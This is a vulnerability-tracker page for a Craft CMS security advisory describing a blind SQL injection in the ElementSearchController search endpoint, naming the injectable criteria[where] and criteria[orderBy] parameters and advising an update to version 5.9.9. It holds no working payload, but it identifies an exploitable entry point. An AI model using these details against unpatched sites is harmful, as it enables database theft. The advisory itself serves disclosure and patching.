Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.
8.7

Craft CMS's Search Function Can Be Hacked

GHSA-g7j6-fmwx-7vp8 CVE-2026-31858
Summary

An attacker can use a Craft CMS search function to access sensitive data. This is possible because a security fix was not applied to this function. To fix this, update to the latest version of Craft CMS, version 5.9.9.

What to do
  • Update craftcms cms to version 5.9.9.
Affected software
VendorProductAffected versionsFix available
craftcms cms > 5.0.0-RC1 , <= 5.9.8 5.9.9
Original title
CraftCMS's `ElementSearchController` Affected by Blind SQL Injection
Original description
The `ElementSearchController::actionSearch()` endpoint is missing the `unset()` protection that
was added to ElementIndexesController in [GHSA-2453-mppf-46cj](https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj).

The exact same SQL injection vulnerability (including `criteria[orderBy]`, the original advisory vector) works on this controller because the fix was never applied to it.

Any authenticated control panel user (no admin required) can inject arbitrary SQL via `criteria[where]`,
`criteria[orderBy]`, or other query properties, and extract the full database contents via boolean-based blind injection.

Users should update to the patched 5.9.9 release to mitigate the issue.
Vulnerability type
CWE-89 SQL Injection
Published: 11 Mar 2026 · Updated: 13 Mar 2026 · First seen: 11 Mar 2026